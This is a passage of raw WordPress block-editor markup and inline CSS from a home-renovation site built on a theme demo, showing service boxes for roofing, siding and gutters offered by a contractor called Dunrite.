976px){\n\n.skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h4 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Roofing</h4></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Never worry again with a quality new roof from Dunrite.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/roofing/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#333;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#333\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"c5d318cb-a5d6-4a1e-9510-c3fb3dd1fdac\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-c5d318cb-a5d6-4a1e-9510-c3fb3dd1fdac .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-c5d318cb-a5d6-4a1e-9510-c3fb3dd1fdac .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-c5d318cb-a5d6-4a1e-9510-c3fb3dd1fdac .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-c5d318cb-a5d6-4a1e-9510-c3fb3dd1fdac .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-c5d318cb-a5d6-4a1e-9510-c3fb3dd1fdac .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-c5d318cb-a5d6-4a1e-9510-c3fb3dd1fdac\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/tiling/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":28,\"title\":\"services-img2\",\"filename\":\"services-img2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8af869eca5\",\"delete\":\"667bc07c15\",\"edit\":\"3755558faf\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=28u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":3796,\"filesizeHumanReadable\":\"4 KB\",\"context\":\"\",\"height\":65,\"width\":77,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\",\"height\":65,\"width\":77,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":77,\"resshowPrefix\":false,\"counterId\":\"c7d7caa5-ceee-43f3-a4c0-2e76984590ee\"} -->\n<style type=\"text/css\"> .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee .skt-blocks-ifb-image-content img {\n width: 77px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Siding</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Either vinyl shakes or custom metal trim contact Dunrite for a free estimate..</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/tiling/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":2,\"blockId\":\"07e40f2e-6c43-4426-9c51-32b198680ee5\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-07e40f2e-6c43-4426-9c51-32b198680ee5 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-07e40f2e-6c43-4426-9c51-32b198680ee5 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-07e40f2e-6c43-4426-9c51-32b198680ee5 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-07e40f2e-6c43-4426-9c51-32b198680ee5 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-07e40f2e-6c43-4426-9c51-32b198680ee5 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 2px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-07e40f2e-6c43-4426-9c51-32b198680ee5\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/painting/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":29,\"title\":\"services-img3\",\"filename\":\"services-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"1df582acb1\",\"delete\":\"75ddbb8dd1\",\"edit\":\"b8f84e66c7\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=29u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":2302,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":59,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\",\"height\":67,\"width\":59,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":59,\"resshowPrefix\":false,\"counterId\":\"4b500be0-2fa9-4b01-a853-bfde34656538\"} -->\n<style type=\"text/css\"> .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538 .skt-blocks-ifb-image-content img {\n width: 59px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Gutters</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">call today for a free estimate on new seamless aluminum gutters by Dunrite..</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/painting/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"44c2922d-ade1-4071-bb8d-5dc07c7e63b3\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"colorLocation1\":68,\"colorLocation2\":44,\"backgroundColor1\":\"#072d69\",\"backgroundColor2\":\"#012257\",\"backgroundType\":\"gradient\",\"className\":\"gb-renovation-section-3\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-3 skt-blocks-block-section-outer-wrap block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3 background-type-gradient alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-image:linear-gradient(90deg, rgba(7, 45, 105, 1) 68%,rgba(1, 34, 87, 1) 44%);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"0bcd67a1-1acd-4911-bbab-bd2854964ee9\"} -->\n<style type=\"text/css\"> .block-0bcd67a1-1acd-4911-bbab-bd2854964ee9 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-0bcd67a1-1acd-4911-bbab-bd2854964ee9 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-0bcd67a1-1acd-4911-bbab-bd2854964ee9 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-0bcd67a1-1acd-4911-bbab-bd2854964ee9 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-0bcd67a1-1acd-4911-bbab-bd2854964ee9 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-0bcd67a1-1acd-4911-bbab-bd2854964ee9 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-0bcd67a1-1acd-4911-bbab-bd2854964ee9 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-0bcd67a1-1acd-4911-bbab-bd2854964ee9 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":34,\"rightPaddingTablet\":0,\"blockId\":\"15c717c2-2df6-496f-b0aa-89c7ee7b446a\"} -->\n<style type=\"text/css\"> .block-15c717c2-2df6-496f-b0aa-89c7ee7b446a .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-15c717c2-2df6-496f-b0aa-89c7ee7b446a .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-15c717c2-2df6-496f-b0aa-89c7ee7b446a .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-15c717c2-2df6-496f-b0aa-89c7ee7b446a .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-15c717c2-2df6-496f-b0aa-89c7ee7b446a .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-15c717c2-2df6-496f-b0aa-89c7ee7b446a\" style=\"width:34%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading 